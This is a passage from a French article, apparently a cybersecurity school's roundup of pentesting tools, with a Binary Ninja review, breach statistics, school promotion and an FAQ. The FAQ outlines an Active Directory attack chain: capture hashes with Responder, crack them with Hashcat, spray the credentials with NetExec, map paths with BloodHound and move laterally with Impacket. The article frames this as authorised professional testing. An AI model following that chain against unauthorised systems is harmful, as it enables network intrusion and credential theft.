Son interface est plus moderne que les alternatives historiques (IDA Pro, Ghidra). Le graphe de flux de contrôle est clair, la décompilation est lisible, et l’API Python permet d’automatiser des analyses récurrentes.

Pour les profils qui ne font pas de reverse engineering quotidien, Ghidra est une alternative gratuite très capable (voir ci-dessus). Binary Ninja se justifie quand vous avez besoin de la réactivité de l’interface et de la qualité de la décompilation au quotidien.

Côté positif
Interface moderne, API Python, bon rapport qualité-prix par rapport à IDA Pro.
Le point faible
La version gratuite (Non-Commercial) est limitée. Et pour du reverse avancé, IDA Pro reste la référence dans les équipes spécialisées.
Un bon choix si votre budget ne permet pas IDA Pro et que vous trouvez Ghidra trop lourd.
Non-Commercial gratuit

Pourquoi le pentesting est devenu indispensable

Le constat est simple. En 2024, Check Point Research a mesuré une hausse de 30 % des cyberattaques par rapport à l’année précédente. Le rapport Verizon DBIR 2025 indique que les identifiants volés et l’exploitation de vulnérabilités représentent plus de 40 % des brèches. Le coût moyen d’une violation de données atteint 4,44 millions de dollars selon IBM. Ces chiffres ne sont pas abstraits. Ce sont les cas que je vois défiler en intervention.

Le problème, c’est que la majorité des entreprises considèrent encore le pentest comme une formalité annuelle pour cocher une case de conformité. Un test par an, c’est mieux que rien. Mais avec des applications qui se mettent à jour chaque semaine et des surfaces d’attaque qui évoluent en permanence (cloud, API, conteneurs, IoT), un test ponctuel ne suffit plus.

Les outils de ce comparatif sont tous gratuits ou accessibles. C’est là l’avantage : vous n’avez pas besoin d’un budget de 50 000 € pour commencer à tester la sécurité de votre infrastructure. Nmap, Metasploit, Wireshark, Burp Community. Le matériel minimum, c’est un laptop avec Kali Linux. Le reste, c’est de la compétence. Et c’est exactement ce que nous formons à Guardia.

En France, le pentest devient un prérequis de fait pour la certification ISO 27001. La directive NIS 2 élargit aussi les obligations de sécurité à des milliers d’entreprises supplémentaires. Le besoin en pentesters formés ne va pas diminuer. Pour en savoir plus, consultez nos fiches métiers en cybersécurité.

Se former au pentesting et à la cybersécurité en France

Maîtriser ces outils est une étape. Mais savoir quand les utiliser, dans quel ordre, et comment interpréter les résultats pour produire un rapport exploitable, c’est ce qui fait la différence entre un script kiddie et un pentester professionnel.

Guardia

Formations en cybersécurité du Bac au Bac+5. Nos étudiants travaillent avec Nmap, Metasploit, Burp Suite et BloodHound dès la première année, sur des CTF, des audits en conditions réelles et des projets avec des entreprises partenaires. Trois campus : Paris, Lyon et Bordeaux.

Jedha

Formations en intelligence artificielle, data et cybersécurité sur 17 campus en France et en Europe. Pour comprendre les modèles IA qui transforment le pentesting et apprendre à les déployer. Du débutant au niveau expert, éligibles CPF et France Travail.

Questions fréquentes

Quel est le meilleur logiciel de hack pour débuter ?

Nmap. C’est le plus simple à prendre en main, le plus documenté, et il vous apprend à lire un réseau. Installez Kali Linux, lancez nmap -sV sur votre propre réseau local, et analysez les résultats. Vous apprendrez plus en une heure qu’en lisant dix tutoriels.

Le pentesting, c’est légal ?

Oui, à condition d’avoir une autorisation écrite du propriétaire du système testé. Sans cette autorisation, c’est un délit (articles 323-1 à 323-7 du Code pénal français). En contexte professionnel, le périmètre est toujours défini dans un contrat avant le début du test.

Faut-il savoir coder pour utiliser ces outils ?

Pour commencer, non. Nmap, Nessus, Wireshark fonctionnent sans écrire une ligne de code. Mais pour progresser, Python et Bash deviennent vite indispensables. Créer vos propres scripts Nmap (NSE), automatiser des tâches dans Metasploit, adapter un exploit à une situation spécifique. C’est là que le codage change tout.

Kali Linux est-il obligatoire ?

Non, mais c’est le chemin le plus court. Kali est une distribution Linux qui intègre la plupart de ces outils pré-installés et configurés. Vous pouvez utiliser chaque outil individuellement sur n’importe quel OS, mais Kali vous fait gagner des heures d’installation.

Quelle certification pour devenir pentester ?

L’OSCP (Offensive Security Certified Professional) est la référence du marché. Elle valide une capacité réelle à exploiter des vulnérabilités en conditions d’examen. Comptez 6 à 12 mois de préparation intensive. Le CEH (Certified Ethical Hacker) est plus théorique et moins reconnu sur le terrain, mais c’est un bon premier jalon. Les formations Guardia préparent à ces certifications.

Hashcat ou John the Ripper, lequel choisir ?

Les deux. Hashcat est plus rapide grâce au GPU, surtout sur les algorithmes courants (NTLM, MD5, SHA). John the Ripper est plus polyvalent sur les formats exotiques (fichiers chiffrés, clés SSH, wallets). En pentest, j’utilise Hashcat en premier pour les gros volumes, puis John pour les cas spécifiques que Hashcat ne gère pas.

BloodHound, Impacket, Responder, NetExec : par où commencer ?

Ces quatre outils forment la chaîne du pentest Active Directory. L’ordre est logique : Responder capture des hash sur le réseau local, Hashcat les cracke, NetExec teste les identifiants obtenus sur tout le réseau, BloodHound cartographie les chemins d’escalade vers le Domain Admin, et Impacket exécute le mouvement latéral. Commencez par BloodHound pour comprendre la logique, puis ajoutez les autres un par un.

Ces outils sont-ils utilisés par les vrais attaquants ?

Oui. La plupart de ces outils sont utilisés des deux côtés. C’est d’ailleurs pour ça qu’il faut les connaître : si vous savez comment fonctionne Nmap, vous savez comment détecter un scan. Si vous comprenez Metasploit, vous comprenez comment se défendre contre un exploit. L’offensive et la défensive sont les deux faces de la même pièce.

Prochaine étape 👇

Prenez rendez-vous pour affiner votre projet

Vous semblez avoir le profil pour rejoindre une de nos écoles. Vous pouvez d'ores et déjà prendre rendez-vous avec nos chargés d'admission pour discuter de votre projet de formation 👇

Vous ne parvenez pas à prendre rdv ? Ecrivez à contact@guardia.school.